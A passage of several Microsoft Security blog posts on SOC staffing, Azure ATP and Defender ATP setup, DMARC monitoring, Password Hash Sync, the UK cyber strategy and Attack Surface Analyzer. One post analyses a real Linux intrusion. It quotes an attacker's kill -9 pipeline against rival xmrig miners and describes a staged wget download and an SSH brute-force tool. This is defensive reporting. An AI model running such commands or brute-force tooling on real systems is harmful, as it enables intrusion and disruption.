For example, we have found that people with military experience are often a good fit because they have experience focusing on the mission despite the strong distractions in ambiguous situations with active hostile adversaries.

We’ve also had success with recruiting and investing into people early in their careers who are eager to learn and have few preconceptions. We’ve had good results with integrating seasoned professionals, but there are simply not enough available for the needs of the marketplace today.

An interesting aspect of the SOC attracting mission-oriented personalities is that when we have a major incident off hours, we more often get too many people volunteering to help versus not enough—a good “problem” to have!

Building skills and job readiness

Because of the high complexity required to be an effective SOC analyst, it’s difficult to educate new analysts in the ways of the SOC through formal training alone. We’ve tried different training approaches to build skills over the years and have found the apprenticeship model to be most effective at rapidly and consistently building skills. For new analysts we take an “I do, we do, you do” approach that progresses from observation to hands on with supervision of a seasoned analyst to independent investigation with support from peers and mentors.

This is similar to other industries with a need to transfer rich context and nuance during real world practice, such as an internship or a residency during a medical career.

The readiness process focuses on building understanding and competency in three domains:

  1. Technical tools/capabilities.
  2. Our organization (mission and assets being protected).
  3. Attackers (motivations, tools, techniques, habits, etc.).

These competencies map well to established doctrine on human conflict. Sun Tzu’s advice to “know thyself” and “know thy enemy” map well to the second and third domains. Our SOC processes also map well to thinking from Colonel John Boyd’s OODA ‘loop’ on real-time human conflict: observe, orient, decide, act.

Beyond the competencies, we also need to train our analysts to be big picture thinkers and maintain an end-to-end view of the attack. It’s not enough to focus on a single threat, but to also “look left and right.” We need our analysts to think about how else the attacker might be trying to gain access and what else they may be after. For example, a password spray may be a potential entry to a multi-stage attack. An attacker may be using a distributed denial-of-service (DDoS) attack to provide a smokescreen to distract from their real objective.

We supplement this apprenticeship model with structured, formal training on topics, such as new products or features and SOC procedures. We also encourage attendance at conferences and work hard to ensure our staffing model supports these and other learning opportunities, so they aren’t empty promises.

This approach has been successful allowing us to train new Tier 1 analysts in approximately 10–12 weeks and we’re continuously looking for ways to improve our readiness processes. In addition, our staffing approach has been critical at mitigating burnout risk.

Learn more

For a visual depiction of our SOC philosophy, download our Minutes matter poster. Also, read previous posts in the “Lessons learned from the Microsoft SOC” series, including Part 1: Organization and Part 2a: Organizing people as well as see our full CISO series to learn more.

For more discussion on some of these topics, see John and Kristina’s session (starting at 1:05:48) at Microsoft’s recent Virtual Security Summit.

Stayed tuned for the next segment in “Lessons learned from the Microsoft SOC” where we discuss the technology that enables our people to accomplish their mission.

The post Lessons learned from the Microsoft SOC Part 2b: Career paths and readiness appeared first on Microsoft Security.

Step 10. Detect and investigate security incidents: top 10 actions to secure your environment

“Step 10. Detect and investigate security incidents” is the final installment in the Top 10 actions to secure your environment blog series. Here we walk you through how to set up Azure Advanced Threat Protection (Azure ATP) to secure identities in the cloud and on-premises.

Azure ATP is a service in the Microsoft Threat Protection solution, which integrates with Azure Identity Protection and Microsoft Cloud App Security and leverages your on-premises Active Directory signals to identify suspicious user and device activity with both known-technique detection and behavioral analytics. It protects user identities and credentials stored in Active Directory and allows you to view clear attack information on a simple timeline for fast triage. Integration with Windows Defender Advanced Threat Protection (Windows Defender ATP) provides a single interface to monitor multiple entry points.

Azure ATP works by analyzing data sent by Azure ATP sensors that parse network traffic from domain controllers (Figure 1). In this blog, we share resources and advice that will help you install and configure the Azure ATP sensors following these steps:

  • Plan your Azure ATP capacity.
  • Install the Azure ATP sensor package.
  • Configure Azure ATP sensor.
  • Detect alerts.

Infographic showing the Azure ATP architecture: Azure ATP sensors parse network traffic from domain controllers and send it to Azure ATP for analysis.

Figure 1: Azure ATP sensors parse network traffic from domain controllers and send it to Azure ATP for analysis.

Plan your Azure ATP capacity

Before you begin your Azure ATP deployment, you’ll need to determine what resources are required to support your Azure ATP sensors. An Azure ATP sensor analyzes network traffic and reads events locally, without the need to purchase and maintain additional hardware or configurations. The Azure ATP sensor also supports Event Tracing for Windows (ETW), which provides the information for multiple detections. ETW-based detections include suspected DCShadow attacks that attempt to use domain controller replication requests and domain controller promotion.

The recommended and simplest way to determine capacity for your Azure ATP deployment is to use the Azure ATP sizing tool. Once you download and run the tool, the details in the “Busy Packets/sec” field will help you determine the resources required for your sensors.

Next, you create your Azure Advanced Threat Protection instance and connect to your Azure Directory forest. You’ll need an Azure Active Directory (Azure AD) tenant with at least one global/security administrator. Each Azure ATP instance supports a multiple Active Directory forest boundary and Forest Functional Level (FFL) of Windows 2003 and above.

Install the Azure ATP sensor package

Once Azure ATP is connected to Azure Directory, you can download the sensor package. Click Download from the Azure ATP portal to begin the process. You need to copy the access key for use when you install the sensor (Figure 2).

Screenshot showing the access key and sensor setup download button in the Azure Directory dash.

Figure 2: The access key is used in installation.

Next, verify the domain controller(s) on which you intend to install Azure ATP sensors have internet connectivity to the Azure ATP Cloud Service. These URLs automatically map to the correct service location for your Azure ATP instance:

  • For console connectivity: <your-instance-name> (For example, “”)
  • For sensors connectivity: <your-instance-name> (For example, “”)

Note: There is no “.” Between <your-instance-name> and “sensorapi”.

Extract the files from the ZIP and run the Azure ATP sensor setup.exe, which initiates the installation wizard. When you get to the Configure the Sensor screen, enter the access key you copied during the download.

Note that all domain controllers in your environment should be covered by an Azure ATP sensor. The Azure ATP sensor supports the use of a proxy.

For more information on proxy configuration, see Configuring a proxy for Azure ATP.

Configure the Azure ATP sensor

The domain synchronizer is responsible for synchronization between Azure ATP and your Active Directory domain. Depending on the size of the domain, the initial synchronization may take time and is resource intensive. We recommend setting at least one domain controller as the domain synchronizer candidate per domain. This ensures Azure ATP is actively scanning your network at all times. By default, Azure ATP sensors aren’t domain synchronizer candidates. To manually set an Azure ATP sensor as a domain synchronizer candidate, switch the domain synchronizer candidate toggle option to ON in the configuration screen (Figure 3).

Screenshot showing the domain synchronizer candidate toggle switched to ON.

Figure 3: The domain synchronizer candidate toggle option set to ON in the configuration screen.

Next, manually tag groups or accounts as sensitive to enhance detections. This is important because some Azure ATP detections, such as sensitive group modification detection and lateral movement paths, rely on sensitive groups and accounts.

We also recommend that you integrate Azure ATP with Windows Defender ATP. Windows Defender ATP monitors your endpoints and the integration provides a single interface to monitor and protect your environment. It is easy to turn on the integration from the Azure ATP portal (Figure 4).

Screenshot showing the Integration with Windows Defender ATP toggle switched to ON.

Figure 4: A simple toggle enables integration with Windows Defender ATP.

You can also integrate with your VPN solution to collect additional user information, such as the IP addresses and locations where connections originated. This complements the investigation process by providing additional information on user activity as well as a new detection for abnormal VPN connections.

Detect alerts

After you set up Azure ATP, we recommend that you set up an Azure ATP security alert lab to help you better understand the alerts which may be generated in your environment. The lab includes a reconnaissance playbook that shows how Azure ATP identifies and detects suspicious activities from potential attacks. The lateral movement playbook allows you to see lateral movement path threat detections and security alerts services of Azure ATP. In the domain dominance playbook, you’ll simulate some common domain dominance methods. For best results set up your lab as close as possible to the instructions in the tutorial.

When Azure ATP is configured, you will be able to manage security alerts in the Security Alerts Timeline of the Azure ATP portal. Azure ATP security alerts provide tools to discover which suspicious activities were identified on your network and the actors and computers involved in the threats. Alerts are organized by threat phase, graded for severity, and color-coded to make them easy to visually filter.

Learn more

This completes our series, “Top 10 actions to secure your environment.” Review the entire series for advice on setting up other Microsoft 365 security products, such as Azure AD or Microsoft Cloud App Security.


The post Step 10. Detect and investigate security incidents: top 10 actions to secure your environment appeared first on Microsoft Security.

Secure your journey to the cloud with free DMARC monitoring for Office 365

Not knowing who is sending email “from” your organization is an enormous problem for IT managers for two reasons.

One problem is “shadow IT”—cloud services that employees have signed up for without IT oversight. Many of these services send mail—to employees, customers, or marketing prospects—which appear to come from your organization, opening you to legal and security risks. Identifying these services and getting them under control is a critical step in any cloud migration project.

The second problem is phishing, which plays a role in over 90 percent of all cyberattacks. For phishers, there’s not a more valuable tool than the ability to impersonate senders. These scammers rely on the fact that there is little stopping them from spoofing any domain they like in the “from” field of their phishing messages.

Domain-based Message Authentication, Reporting, and Conformance (DMARC) is an essential tool for solving both of these problems. When an organization gets its domains to a quarantine or reject policy—what’s known as DMARC enforcement—it gains complete visibility into and control over all email purporting to be from that organization. For more on DMARC policies and how they pertain to inbound mail, read the “Best practices on implementing DMARC in Office 365” section in the Microsoft article Using DMARC to validate email in Office 365.

Before a company can get to an enforcement policy, it needs to identify all the email senders using its domain. If this crucial and potentially challenging step is omitted, it may wind up inadvertently blocking legitimate email sources (like a payroll provider or your CRM tool), simply because it hasn’t specifically authorized them.

While the benefits of DMARC are clear, many organizations have had trouble with the implementation of this open standard. DMARC directs receiving mail servers to send aggregate reports back to domain owners, so they can analyze which services are sending mail on their behalf. This data is valuable for both cloud migration and anti-phishing projects.

But it can be difficult to extract actionable intelligence from these reports, which are typically large XML files containing long lists of IP addresses. Companies need to do extensive “detective work” to figure out which services correspond to those IPs and which people within their organization are responsible for using those services, which includes updating the corresponding DMARC, Sender Policy Framework (SPF), and DomainKeys Identified Mail (DKIM) records to ensure that the services are properly authorized. What’s more, every change requires updating the Domain Name System (DNS), which itself can be an involved process.

What if you don’t have the time and resources to allocate to this long-term, sometimes tedious technical analysis?

Valimail Monitor for Office 365 can make this part of the DMARC journey much easier. Instead of manually parsing the massive amount of XML-based IP address data you get in DMARC reports, Valimail Monitor for Office 365 digests DMARC aggregate reports and turns them into an easily readable list of named services. In addition, for each of these services, Valimail shows how many messages are passing authentication and how many are failing and provides overall stats on DMARC authentications and authentication failures. This greatly simplifies this critical stage of the DMARC journey.

Screenshot of the DMARC Authentication Failure Rate in the Valimail Monitor dash.

The challenge is identification

Setting up a DMARC record isn’t difficult—it’s a simple txt record in DNS—and there are only three tags needed to configure a correct DMARC record. Once configured, the domain owner receives daily aggregate reports, via email, from virtually every mail receiver worldwide that gets mail from that domain.

The challenging part, as noted above, is using those DMARC aggregate reports to identify all those services that are sending email “as” the domain.

Here’s why it’s hard: In the era of cloud IT, it’s quite common for organizations to have dozens of third-party services sending email on their behalf. For example, an organization may have CRM, HR, support, payroll, and other workflow services that are core to its business. The one thing that ties all these services together is that they all rely on the company’s domain name to send email—notifications, invoices, receipts, and the like—which all need to come “from” the company. Their use of a domain name is a defacto standard that leverages the implicit trust employees, customers, and partners have when they do business with a company. (Watch a short one-minute video explaining why so many DMARC projects run into trouble.)

Before moving to a policy of enforcement, a company needs to have the confidence that it has correctly identified all these senders and white-listed them in its SPF configuration, and/or configured their DKIM keys correctly.

DMARC is incredibly useful to block phishing attacks and protect the brand, but many Office 365 customers who have implemented DMARC have not reached enforcement. They’ve manually parsed DMARC reports with self-help tools or consulting support. They’ve looked at millions of lines of XML to extract IP addresses which they then need to translate to named services. These services themselves may live on multi-tenant clouds, so discerning the true identity of a given service is further challenging because the underlying cloud infrastructure could be shared and may change without notice.

A fully automated, free service

Valimail Monitor for Office 365 makes the service-discovery component of DMARC implementation far easier, providing a fully automated visibility service, free of charge. With Valimail, Office 365 users can easily see all third-party services sending on their behalf, as well as potential imposters that are spoofing their brand. It eliminates the need to wade through XML-based aggregate reports or try to interpret which IP addresses correspond to which cloud services. Valimail Monitor for Office 365 provides a clean, clear, human-readable interface that lists services and their email volume on the domain in plain English.

Screenshot of reports in the Valimail Monitor dashboard.

With full visibility, Office 365 customers will be armed with all the information they need to determine which services are legitimate and authorized. From there, they’ll be in a position to confidently move their organization to full DMARC enforcement, where all unauthenticated traffic is blocked. Valimail makes this easy as well, with an upgrade path to Valimail Enforce, which fully automates DMARC enforcement.

As a member of the Microsoft Intelligent Security Association, Valimail provides a critical free service for Office 365 customers who want the benefits of DMARC enforcement. DMARC enforcement, together with the anti-spoofing and anti-phishing capabilities in Office 365, will effectively stop an entire class of phishing attacks.

Configuring Valimail Monitor for Office 365

Here’s how to get started with Valimail Monitor for Office 365:

  1. Sign up at the Valimail Monitor for Office 365 website.
    Note: This is a free service for Office 365 customers. Once you sign up, Valimail will email you the simple configuration instructions.
  2. Set aside five minutes to make the change in DNS to send your DMARC reports to Valimail (this has no impact on your email flow, deliverability, or any other aspect of your DNS).

Screenshot of Source of Email in last thirty days in the Valimail Monitor dashboard.

Within two weeks, Valimail Monitor will provide you a list of senders using your domain, and it will keep the list updated in real-time as DMARC reports continue to flow in. It also shows you where in the world emails sent using your domain are coming from. Don’t have an office or server in Brazil? That might just be the red flag you need to shut down a phisher impersonating your brand.

Using the Valimail dashboard, you’ll have the intelligence you need to know who is sending email using your domain and from where, so you can focus your time and resources on more complex activities to protect your organization.

Sign up for free at:

The post Secure your journey to the cloud with free DMARC monitoring for Office 365 appeared first on Microsoft Security.

Demystifying Password Hash Sync

This blog is part of a series of posts providing a behind-the-scenes look of Microsoft’s Detection and Response Team (DART). While responding to cybersecurity incidents around the world, DART engages with customers who are wary about using Password Hash Sync (PHS) or are not utilizing this service’s full capabilities. As customers can gain tremendous security benefits using the full capabilities of this service, we want to demystify PHS.

What PHS is and is not

What is PHS? First, let’s start with what it is not. PHS doesn’t sync actual passwords. Rather, it syncs the hashes of passwords, which have all undergone a per-user salt and 1,000 iterations of the HMAC-SHA256 key hashing algorithm, before being sent to Azure Active Directory (Azure AD). Through our hands-on experiences, we’ve learned that many companies believe that Microsoft may have access to users’ passwords. Microsoft is committed to protecting your privacy, and it’s important to note that the SHA256 hash cannot be decrypted—so the plain-text version of the password is never and can never be exposed to Microsoft.

The second important consideration of PHS is that, with PHS your Identity Management provider is moved from your current provider to Azure AD. This allows the organization to move from an Identity Management provider—which is typically an on-premises server and requires maintenance and potentially server downtime—to a platform-as-a-service (PaaS) provider.

From a security perspective, organizations gain significant reliability advantages and improved capabilities by moving to PHS, including Smart Lockout, IP Lockout, and the ability to discover leaked credentials, as well as the benefits of utilizing Microsoft’s billions of worldwide data points as additional layers of security to your organization’s environment.

More about these key features:

  • Smart Lockout assists in blocking bad actors who are attempting to brute force passwords. By default, Smart Lockout locks the account from sign-in attempts for one minute after ten failed attempts. Smart Lockout tracks the last three bad password hashes to avoid re-incrementing the lockout counter. For more information Smart Lockout, see Azure AD Smart Lockout.
  • IP Lockout works by analyzing those billions of sign-ins to assess the quality of traffic from each IP address hitting Microsoft’s systems. With that analysis, IP Lockout finds IP addresses acting maliciously, such as an IP that is password spraying the tenant, and blocks those sign-ins in real-time, while allowing the real user to continue to successfully sign in.
  • Microsoft Leaked Credentials Service acquires username/password pairs by monitoring public web sites and the Dark Web and by working with:
    • Researchers
    • Law enforcement
    • Microsoft Security teams
    • Other trusted sources

When the service acquires username/password pairs, the passwords are sent through the same hashing algorithm and are checked against Azure AD users’ password hashes. When a match is found (indicating a compromised credential), a “Leaked Credentials Risk Event” is created. Please see Azure AD Risk Events for additional information regarding Leaked Credentials.

Another important benefit to PHS is that, should your tenant experience a Denial of Service (DoS) and/or Password Spray attack, Microsoft will take the brunt of that traffic. That traffic is directed at Microsoft, not your on-premises Active Directory Federated Services (AD FS). When authentication happens via on-premises AD FS your server is responsible for managing the load and potentially causing downtime.

Moving an organization’s identity management provider to Azure AD and utilizing Password Hash Sync allows for both an increase in overall security posture and reduced management overhead. The security benefits, including leaked credentials, IP lockout, and Smart Lockout, all utilize Microsoft’s telemetry that gives organizations the power of Microsoft’s intelligence.

NOTE: If PHS is the secondary authentication method and, if you choose to take advantage of Smart Lockout and IP Lockout, the primary authentication method must support these functionalities. PHS is recommended as secondary in a hybrid environment if Federated or Pass-through Authentication is primary as a redundancy mechanism, as well as the ability to collect information for Leaked Credentials.

Learn more

To learn more about DART, our engagements, and how they are delivered by experienced cybersecurity professionals who devote 100 percent of their time to providing cybersecurity solutions to customers worldwide, please contact your account executive. Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Read DART: the Microsoft cybersecurity team we hope you never meet for more about the DART team.

The post Demystifying Password Hash Sync appeared first on Microsoft Security.

Uncovering Linux based cyberattack using Azure Security Center

As more and more enterprises move to the cloud, they also bring their own set of security challenges. Today, almost half of Azure virtual machines (VMs) are running on Linux, and as the Linux server population grows, so are the attacks targeting them. As detection capabilities advance, attackers are using new and stealthier techniques to stay undetected and persist with their motives. Azure Security Center, Microsoft’s cloud-based cyber solution, helps customers safeguard their cloud workloads as well as protect them from these threats.

In this blog post, we detail a real-world Linux attack whose purpose initially looked like crypto mining, but it turned out that the attacker’s intent was to use the compromised host as a launchpad for further large-scale attacks.

Incident details

After the initial successful SSH brute force compromise, the attacker proceeds to download a first stage ‘’ script using utilities like ‘wget’ that delivers further payload to the host. Azure Security Center surfaces this behavior via a “Detected suspicious file download” alert.

Post stage 1 download, the attacker executed the script to find ‘dota.tar.gz’ by enumerating multiple hosting URLs. Once a live hosting IP was found, the second stage file gets delivered in directory ‘/tmp/.mountfs.’ Most of these exploitation and persistence techniques are observed from the /tmp folder. In this case all activities were tracked under /tmp/.mountfs and /tmp/.mountfs/.rsync directories. Creating directories with a dot keeps the activity hidden from the user interface, a common technique used by attackers.

Later, we see traffic to different mining pools including ‘’ but nothing further that would confirm the purpose as mining cryptocurrency. The “Detected suspicious network activity” analytic triggered on this activity along with “Digital currency mining” analytic. This was followed by reconnaissance grep activity used by the attacker to get more information on the target machine to see if it had already been compromised and in use by other actors.

The attackers then used a bash script to search and kill processes on some of the above-mentioned miners that they grepped using command:

“ps auxf|grep -v grep|grep “xmrig” | awk ‘{print $2}’|xargs kill -9”

Let’s talk more about what this command does. The first command helps to show a tree view of parent-child processes in the output of ps (process status).The first grep removes the grep process from this list and the second grep will extract any xmrig (a well-known miner) process in the filtered list. Awk pattern matches the specified pattern and xargs executes the SIGKILL signal.

What follows next is a series of pkill commands to kill processes using couple of techniques that:

  1. Match the entire process and argument list pattern.
  2. Forcefully terminate a process.

To get the maximum CPU usage and efficiency, attackers generally start deleting the existing coin miner instances and focus on deploying new instances of mining payload.

Generally, after this activity, the traces of cryptocurrency wallet or other activities related to mining becomes evident but what followed next was a little surprise.

It turns out that this machine appeared to have been used to target 20,000 different endpoints based on our timeline of attack analysis detailed below:

Azure Security Center caught most of the suspicious activities observed above that triggered security alerts. To further our investigation, we collaborated with our internal memory forensics team. The analysis of the ELF payload unfolded even more details in this attack campaign:

  • The payload had three important components:
    • tsm64: An ELF executable.
    • Libraries that tsm64 relied on for execution.
    • tsm: Code used to launch the tsm64 executable.
  • To ensure that the attacker payload was able to run on most distributions, the attackers supplied the libraries tsm64, which was dependent on for successful execution.
  • tsm: tsm is renamed. is a helper program that loads the shared libraries needed by the program executable, prepares the program to run, and then runs it.
  • Dependent libraries: The dependency analysis of the tsm64 executable showed that it needed four libraries at the runtime. Namely,,,, and
  • tsm64: This is the executable that the attacker eventually wants to run. Turns out, tsm64 is a multi-threaded SSH brute force tool that can attack a set of IP’s with provided passwords.
  • The analysis of the Procedure Linkage Table (PLTs) for tsm64 showed the multi-threaded, network communication, and password file reading capabilities. A subset of the system apis are listed below:
    • Networking: setsockopt, getsockopt, getsockname, connect, gethostname, socket, inet_ntoa, recvfrom, recv, bind, getaddrinfo, inet_pton, getpeername
    • Multi-threaded (pthread): pthread_getspecific, pthread_setspecific, pthread_cond_signal, pthread_mutex_init, pthread_create, pthread_cond_init, pthread_key_delete, pthread_self, pthread_join, pthread_equal, pthread_cond_wait, pthread_detach, pthread_once, pthread_mutex_lock, pthread_key_create, pthread_mutex_destroy, pthread_cond_broadcast, pthread_mutex_unlock, pthread_kill
    • Password file entry: getpwnam, getpwnam_r, getpwuid_r
  • The IP address list and user credentials to be used for the brute force attack were downloaded into innocuous sounding file names ‘a’ and ‘b.’ File ‘a’ contained a list of 20,000 different IP addresses while file ‘b’ had a listing of credentials. These files were later renamed to ‘ip’ and ‘p’ respectively and passed into tsm64.
  • Using the inbuilt timeout utility, the tool was programmed to run for a maximum time of 90 minutes.

Adversaries are always finding new and novel ways to evade detection. As cyber defenders, we need to constantly innovate and track these latest threats in order to thwart new and deceptive attacks that are making rounds in the cloud cyber world.

Recommended actions

  • Azure Security Center can automatically correlate such multiple triggered alerts into a single security incident. This capability provides a single overview of any attack campaign and all the related alerts to understand the action attackers took and what resources were impacted.
  • While Azure Security Center alerted on the activity, the intrusion could have been prevented through good password hygiene. It’s recommended to utilize passwords and passphrases that are not easily guessed. Some of our previous blogs cover this topic: Just In Time (JIT) , Password-less sign-in, and Azure Key Vault.
  • Azure Security Center alerts can also be integrated in existing SIEM solution for a centralized view of security posture across your organization or with Microsoft’s new SIEM Azure Sentinel.

Learn more

To learn more about the Azure Security Center, see the following:

The post Uncovering Linux based cyberattack using Azure Security Center appeared first on Microsoft Security.

UK launches cyberstrategy with long-term relevance

Like most major global economies, the United Kingdom continues to place cybersecurity issues front and center. The National Cyber Security Strategy: 2016-2021 document—published by the UK Government and released nearly two years ago—describes the plan to make the UK secure and resilient in cyberspace. It’s the most frequently referenced document and project in any cybersecurity discussion. After two years, and with recent updates, it’s worthwhile to revisit the document to assess its importance in securing digital transformation across the UK’s economy. Moreover, the National Security Capability Review (NSCR) March 2018 update to the National Cyber Security Strategy makes the timing for a review of this all the more relevant, as the 80-page document is well-written, thorough, and remains useful and relevant. The cyberstrategy’s core pillars—defend, deter, and develop—are described in detail and address a wide array of important topics, including education, international cooperation, and public-private collaboration.

Specifically, the cybersecurity document does an excellent job in the following areas:

  • Insider threats—This type of threat is highlighted throughout the document; something that is not always emphasized sufficiently. For example, “Insider threats remain a cyber risk to organizations in the UK. Malicious insiders, who are trusted employees of an organization and have access to critical systems and data, pose the greatest threat.” We continue to hear about this problem from customers in nearly all industries and in all countries. This bold and clear statement makes it clear that this problem is front and center for the UK strategy, as it should be.
  • Public incidents—It’s refreshing to see major incidents that impact companies and organizations in the UK highlighted rather than hidden from public view. The document includes several incidents, such as the 2015 TalkTalk breach, and the 2016 attack on the Society for Worldwide Interbank Financial Telecommunication (SWIFT) payment system in Bangladesh, the Philippines, and the Ukrainian power grid incident. While these incidents did not all occur on UK soil or directly to UK organizations, their impact was still felt in the UK.
  • Diversity and inclusion—The UK is committed to increasing diversity while also addressing its cybersecurity skills shortage. The document states emphatically that “we will address the gender imbalance in cyber-focused professions, and reach people from more diverse backgrounds to make sure we are drawing from the widest available talent pool.” The need is so critical that cybersecurity has become known as a wonderful field for younger professionals to embark on a new career, even if it is not something that is well-known.
  • Public-private collaboration—Cybersecurity is a “team sport” and working together across private and public sectors is essential. Openly admitting this and accepting government responsibility is a key tenet of this strategy, described as, “Government has a clear leadership role, but we will also foster a wider commercial ecosystem, recognizing where industry can innovate faster than us.” The document also states, “We will set out more clearly the respective roles of government and industry, including how these might evolve over time.”

As we look at other areas that the strategy may wish to consider expanding into or elaborating upon in the coming years, three specific areas come to mind:

  • Links to money laundering and terrorist financing—While the initial 2016 version did not mention how the flow of money impacts and funds cybercrime, the NSCR March 2018 update did, with three specific references to money laundering and terrorist financing, explaining, “We will take a whole-of-government approach including with the Devolved Administrations to tackle serious and organized crime and publish an updated Serious and Organized Crime Strategy in 2018.” It also stated, “We remain a leading player in developing and applying economic sanctions [… and will] … continue using sanctions smartly to deliver national security outcomes after we have left the EU.”
  • Returning military veterans—Whether it be from armed conflicts or peace-keeping missions or other such activities, one way the UK could shrink the gap in cybersecurity skills would be to help military veterans transition into this field. The strategy states, “This skills gap represents a national vulnerability that must be resolved.” To that end, there are multiple paths that other countries have pursued that could be applied here.
  • Cloud computing—The terms “cloud” and “cloud computing” are not mentioned in the original 2016 strategy document or in the NSCR March 2018 update. Cloud-based security offerings are a mainstay of any cybersecurity strategy and bring with them enormous benefits, speed, operational efficiencies, and more.

Looking ahead, it is inspiring to see that in the NSCR March 2018 update to the National Cyber Security Strategy there is a real commitment to maintaining the course with the original 2016 strategy. The 2018 update states quite openly that “the NSCR cyber project confirms that our overarching strategic objectives still stand” and “We will continue to implement the National Cyber Security Strategy and ensure it keeps pace with the threat.”

Clearly the UK will stay the course with its original cybersecurity strategy with additional changes and enhancements. Moreover, with all eyes on the UK transition out of the EU, it’s important to demonstrate to the world community that cybersecurity strategy can not only exist but in fact can thrive even amid a massive overhaul in international geopolitics.

The post UK launches cyberstrategy with long-term relevance appeared first on Microsoft Security.

Step 9. Protect your OS: top 10 actions to secure your environment

In “Step 9. Protect your OS” of the Top 10 actions to secure your environment blog series, we provide resources to help you configure Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) to defend your Windows, macOS, Linux, iOS, and Android devices from advanced threats.

In an advanced threat, hackers and cybercriminals infiltrate your network through compromised users or vulnerable endpoints and can stay undetected for weeks—or even months—while they attempt to exfiltrate data and move laterally to gain more privileges. Microsoft Defender ATP helps you detect these threats early and take action immediately.

Enabling Microsoft Defender ATP and related products will help you:

  • Mitigate vulnerabilities.
  • Reduce your attack surface.
  • Enable next generation protection from the most advanced attacks.
  • Detect endpoint attacks in real-time and respond immediately.
  • Automate investigation and remediation.

Threat & Vulnerability Management

Threat & Vulnerability Management is a new component of Microsoft Defender ATP that provides:

  • Real-time endpoint detection and response (EDR) insights correlated with endpoint vulnerabilities.
  • Linked machine vulnerability and security configuration assessment data in the context of exposure discovery.
  • Built-in remediation processes through Microsoft Intune and Microsoft System Center Configuration Manager.

To use Threat & Vulnerability Management, you’ll need to turn on the Microsoft Defender ATP preview features.

Attack surface reduction

Attack surface reduction limits the number of attack vectors that a malicious actor can use to gain entry. You can configure attack surface reduction through the following:

  • Microsoft Intune
  • System Center Configuration Manager
  • Group Policy
  • PowerShell cmdlets

Enable these capabilities to reduce your attack surface:

Hardware-based isolation Configure Microsoft Defender Application Guard to protect your company while your employees browse the internet. You define which websites, cloud resources, and internal networks are trusted. Everything not on your list is considered untrusted.
Application control Restrict the applications that your users can run and require that applications earn trust in order to run.
Device control Configure Windows 10 hardware and software to “lock down” Windows systems so they operate with properties of mobile devices. Use configurable code to restrict devices to only run authorized apps.
Exploit protection Configure Microsoft Defender Exploit Guard to manage and reduce the attack surface of apps used by your employees.
Network protection Use network protection to prevent employees from using an application to access dangerous domains that may host phishing scams, exploits, and other malicious content.
Controlled folder access Prevent apps that Microsoft Defender Antivirus determines are malicious or suspicious from making changes to files in protected folder.
Network firewall Block unauthorized network traffic from flowing into or out of the local device.
Attack surface reduction controls Prevent actions and apps that are typically used by exploit-seeking malware to infect machines.

Next generation protection

The Intelligent Security Graph powers the antivirus capabilities of Microsoft Defender Antivirus, which works with Microsoft Defender ATP to protect desktops, laptops, and servers from the most advanced ransomware, fileless malware, and other types of attacks.

Configure Microsoft Defender Antivirus capabilities to:

Enable cloud-delivered protection Leverage artificial intelligence (AI) and machine learning algorithms to analyze the billions of signals on the Intelligent Security Graph and identify and block attacks within seconds.
Specify the cloud-delivered protection level Define the amount of information to be shared with the cloud and how aggressively new files are blocked.
Configure and validate network connections for Microsoft Defender Antivirus Configure firewall or network filtering rules to allow required URLs.
Configure the block at first sight feature Block new malware within seconds.

Endpoint detection and response

Microsoft Defender ATP endpoint detection and response capabilities detect advanced attacks in real-time and give you the power to respond immediately. Microsoft Defender ATP correlates alerts and aggregates them into an incident, so you can understand cross-entity attacks (Figure 1).

Alerts are grouped into an incident based on these criteria:

  • Automated investigation triggered the linked alert while investigating the original alert.
  • File characteristics associated with the alert are similar.
  • Manual association by a user to link the alerts.
  • Proximate time of alerts triggered on the same machine falls within a certain timeframe.
  • Same file is associated with different alerts.

Image of the Windows Defender Security Center.

Figure 1. Microsoft Defender ATP correlates alerts and aggregate them into incidents.

Review your alerts and incidents on the security operations dashboard. You can customize and filter the incident queue to help you focus on what matters most to your organization (Figure 2). You can also customize the alert queue view and the machine alerts view to make it easier for you to manage.

Image of a list of incidents in the Windows Defender Security Center.

Figure 2. Default incident queue displays incidents seen in the last 30 days, with the most recent incident showing at the top of the list.

Once you detect an attack that requires remediation, you can take the following actions:

Auto investigation and remediation

Microsoft Defender ATP can be configured to automatically investigate and remediate alerts (Figure 3), which will reduce the number of alerts your Security Operations team will need to investigate manually.

Image showing automated investigations in Microsoft Defender ATP.

Figure 3. You can view the details of an automated investigation to see information such as the investigation graph, alerts associated with the investigation, the machine that was investigated, and other information.

Create and manage machine groups in Microsoft Defender ATP to define automation levels:

Automation level Description
Not protected. Machines will not get any automated investigations run on them.
Semi – require approval for any remediation. This is the default automation level.
An approval is needed for any remediation action.
Semi – require approval for non-temp folders remediation. An approval is required on files or executables that are not in temporary folders. Files or executables in temporary folders, such as the user’s download folder or the user’s temp folder, will automatically be remediated if needed.
Semi – require approval for core folders remediation. An approval is required on files or executables that are in the operating system directories such as Windows folder and program files folder. Files or executables in all other folders will automatically be remediated if needed.
Full – remediate threats automatically. All remediation actions will be performed automatically.

Microsoft Threat Experts

Microsoft Threat Experts is a new, managed threat hunting service that provides proactive hunting, prioritization, and additional context and insights that further empower security operations centers (SOCs) to identify and respond to threats quickly and accurately with two capabilities:

  1. Targeted attack notifications—Alerts that are tailored to organizations provide as much information as can be quickly delivered to bring attention to critical network threats, including the timeline, scope of breach, and the methods of intrusion.
  2. Experts on demand—When a threat exceeds your SOC’s capability to investigate, or when more actionable information is needed, security experts provide technical consultation on relevant detections and adversaries. In cases where a full incident response becomes necessary, seamless transition to Microsoft incident response services is available.

Microsoft Defender ATP customers can register for Microsoft Threat Experts and we will reach out to notify you via email when you’ve been selected.

Learn more

Check back in a few weeks for our final blog post in the series, “Step 10. Detect and investigate security threats,” which will give you tips to deploy Azure Advanced Threat Protection to detect suspicious activity in real-time.


The post Step 9. Protect your OS: top 10 actions to secure your environment appeared first on Microsoft Security.

Announcing the all new Attack Surface Analyzer 2.0

Few of us know what is really happening on our systems when we install new software from new or untrusted sources. This is important because most installation processes require elevated privileges, which can lead to undesired system configuration changes. Knowing what changes have been made is vital to maintaining the security of your system, data, and networks. Identifying those changes can be challenging and time consuming without a little help.

The classic Attack Surface Analyzer 1.0 was released in 2012 to help software developers and IT professionals identify changes made to Windows operating systems during application installations. This year, we decided to rewrite the tool to take advantage of modern, cross-platform technologies like .NET Core and Electron. Attack Surface Analyzer 2.0 now runs on Windows, Linux, and macOS and is available as an open source project on GitHub.

